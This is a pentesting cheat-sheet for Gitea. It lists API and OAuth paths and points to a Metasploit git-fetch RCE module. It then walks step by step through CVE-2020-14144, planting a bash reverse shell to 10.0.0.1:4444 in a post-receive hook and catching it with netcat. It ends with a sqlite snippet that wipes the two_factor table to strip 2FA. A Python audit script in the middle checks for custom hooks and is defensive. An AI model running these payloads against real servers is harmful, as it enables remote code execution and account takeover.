Gitea Pentesting
Last modified: 2023-03-18
Gitea is a forge software package for hosting software development version control using Git.
Common Directories
/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users
# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys
Investigation
Get Secrets in Web Hooks
In an existing repository, the webhook secret value may be exposed under the repository → Settings → Webhooks.
Git Fetch Remote Code Execution (RCE)
Metasploit
msfconsole
msf> use exploit/multi/http/gitea_git_fetch_rce
msf> (set options)
msf> run
Git Hooks Remote Code Execution (RCE)
This is CVE-2020-14144.
1. Login
Access the Gitea dashboard and log in with an existing account.
2. Create a New Repository
3. Go to the Repository’s Settings
In the new repository we’ve created, go to Settings → Git Hooks → post-receive.
4. Update to the Reverse Shell Payload
In the post-receive edit page, inject the payload as below:
#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4444
5. Start Listener in Terminal
To receive the outgoing connection from the git hook, start a listener.
nc -lvnp 4444
6. Create and Push the New Repository from the Terminal
mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master
After pushing, the git hook is triggered and executes the reverse shell command, so we should now receive a shell on the listener.
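A defender-side check for the hook abuse described above, added here as an example and not code from the original page or from Gitea itself: it audits a Gitea repository root for custom server-side hook scripts and reads DISABLE_GIT_HOOKS from app.ini. It assumes Gitea's layout of hooks/<event>.d/ inside each bare repository with Gitea's own script named gitea, assumes DISABLE_GIT_HOOKS defaults to true when absent, and constructs its sample data in a temporary directory.

```python
"""Audit a Gitea data directory for custom server-side git hooks (defensive check)."""
import configparser
import tempfile
from pathlib import Path

HOOK_EVENTS = ("pre-receive", "update", "post-receive")


def git_hooks_disabled(app_ini: Path) -> bool:
    """True when [security] DISABLE_GIT_HOOKS is on (assumed Gitea default when absent)."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False)
    cfg.optionxform = str  # Gitea keys are upper-case; keep them as written
    cfg.read(app_ini)
    return cfg.getboolean("security", "DISABLE_GIT_HOOKS", fallback=True)


def find_custom_hooks(repo_root: Path) -> list:
    """List (owner/repo.git, event, script) for every script the delegate hook would
    run that is not Gitea's own 'gitea' script (assumed layout: hooks/<event>.d/)."""
    findings = []
    for gitdir in sorted(repo_root.glob("*/*.git")):
        for event in HOOK_EVENTS:
            hook_dir = gitdir / "hooks" / f"{event}.d"
            if not hook_dir.is_dir():
                continue
            for script in sorted(hook_dir.iterdir()):
                if script.name != "gitea" and script.read_text(errors="replace").strip():
                    findings.append((f"{gitdir.parent.name}/{gitdir.name}", event, script.name))
    return findings


def audit(repo_root: Path, app_ini: Path) -> dict:
    return {"git_hooks_disabled": git_hooks_disabled(app_ini),
            "custom_hooks": find_custom_hooks(repo_root)}


def build_sample_instance(base: Path):
    """Construct a toy Gitea layout: one clean repo, one with a custom post-receive hook."""
    repos = base / "gitea-repositories"
    for owner, name, custom in (("alice", "clean", ""), ("bob", "test", "#!/bin/bash\necho custom\n")):
        d = repos / owner / f"{name}.git" / "hooks" / "post-receive.d"
        d.mkdir(parents=True)
        (d / "gitea").write_text("#!/usr/bin/env bash\n# Gitea's own hook (constructed stand-in)\n")
        if custom:
            (d / "post-receive").write_text(custom)
    ini = base / "app.ini"
    ini.write_text("[security]\nDISABLE_GIT_HOOKS = false\n")  # the risky setting
    return repos, ini


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        repos, ini = build_sample_instance(Path(tmp))
        return audit(repos, ini)


if __name__ == "__main__":
    print(demo())
```

On a hardened instance the expected result is DISABLE_GIT_HOOKS true and an empty custom-hook list; any script listed should be reviewed with the repository's owner.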
Swagger API
We can access /api/swagger to interact with the Swagger API.
Get New Token & Authorize
We need a token to use the Swagger API.
- Register a new account from the Gitea top page.
- Go to /user/settings/applications and generate a new token.
- Copy the token value, e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
- Go to /api/swagger.
- Click the “Authorize” button. A modal window opens.
- Paste the token into the “Token” section.
Delete Two-Factor Authentication
victim@machine:/gitea/gitea$ python3
>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()